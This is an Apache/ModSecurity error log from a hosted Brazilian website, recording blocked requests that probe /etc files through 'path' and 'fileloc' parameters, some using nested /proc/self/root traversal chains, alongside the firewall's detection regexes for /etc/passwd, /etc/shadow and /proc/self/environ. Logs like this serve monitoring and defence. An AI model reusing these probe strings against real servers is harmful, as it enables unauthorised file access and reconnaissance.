[Fri Mar 20 05:32:20.139068 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.70:59704] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GFPHIg5MgXLBnicPcTgAAAcg"]
[Fri Mar 20 05:32:20.359122 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.86:59720] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GFPXLqtnMIWvjpaJ80wAAAoM"]
[Fri Mar 20 05:32:20.619967 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.93:59732] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GFAF0L0L-SsrnPo5KngAAAss"]
[Fri Mar 20 05:32:22.381495 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.69:59778] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GFTJ3M9BSuKP7CAb1xwAAAJI"]
[Fri Mar 20 05:32:22.396043 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.1:59756] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GFDJ3M9BSuKP7CAb1xQAAAIY"]
[Fri Mar 20 05:32:22.416158 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.119:59820] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GFrninkcc-iUj5ApBgAAAA4M"]
[Fri Mar 20 05:32:26.655343 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.11:60078] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GGl1pVZ5mVmJwsFMSlQAAAFY"]
[Fri Mar 20 05:32:28.289602 2026] [:error] [pid 31215:tid 140411557287680] [client 57.141.18.124:60180] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GHAF0L0L-SsrnPo5KpwAAAtY"]
[Fri Mar 20 05:32:28.515069 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.43:60192] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GHLninkcc-iUj5ApBiwAAA4U"]
[Fri Mar 20 05:32:30.715234 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.93:60310] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GHjJ3M9BSuKP7CAb10AAAAII"]
[Fri Mar 20 05:32:30.810938 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.20:60322] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GHvXLqtnMIWvjpaJ86AAAAog"]
[Fri Mar 20 05:32:31.203057 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.105:60284] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GH7ninkcc-iUj5ApBkgAAA4s"]
[Fri Mar 20 05:32:31.331108 2026] [:error] [pid 31215:tid 140411590858496] [client 57.141.18.62:60340] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GHwF0L0L-SsrnPo5KrgAAAtI"]
[Fri Mar 20 05:32:31.963172 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.241.31:33202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GH7ninkcc-iUj5ApBlAAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:32:35.342955 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:38920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GIwF0L0L-SsrnPo5KsgAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:32:37.719110 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:38932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GJfqxLDW4GITHUkTFpAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:32:40.306766 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:57096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GKPqxLDW4GITHUkTFrQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:32:43.795083 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.117:60718] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GKzJ3M9BSuKP7CAb13gAAAJE"]
[Fri Mar 20 05:32:44.219296 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.87:60736] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GLF1pVZ5mVmJwsFMSsAAAAEU"]
[Fri Mar 20 05:32:45.626949 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.95:60828] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GLQF0L0L-SsrnPo5KtwAAAsc"]
[Fri Mar 20 05:32:55.852758 2026] [mime_magic:error] [pid 31215:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:33018] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:33:04.017826 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 57.141.18.110:33598] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:33:04.025772 2026] [mime_magic:error] [pid 9818:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:33590] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:33:06.937797 2026] [mime_magic:error] [pid 10189:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:57108] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/lldpd
[Fri Mar 20 05:33:13.865098 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.41:34140] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GSfHIg5MgXLBnicPckQAAAc0"]
[Fri Mar 20 05:33:13.865166 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:54840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GSAF0L0L-SsrnPo5K7QAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:33:13.880982 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.0:34136] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GSfXLqtnMIWvjpaJ9IQAAApI"]
[Fri Mar 20 05:33:20.659862 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.78:34460] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GUOoXxyEfFpUF8f9k5wAAAUw"]
[Fri Mar 20 05:33:24.171410 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.118:34580] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GVNa6ubjKNq_cu4a0TgAAA1c"]
[Fri Mar 20 05:33:24.643700 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.26:34594] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GVOoXxyEfFpUF8f9k7wAAAVU"]
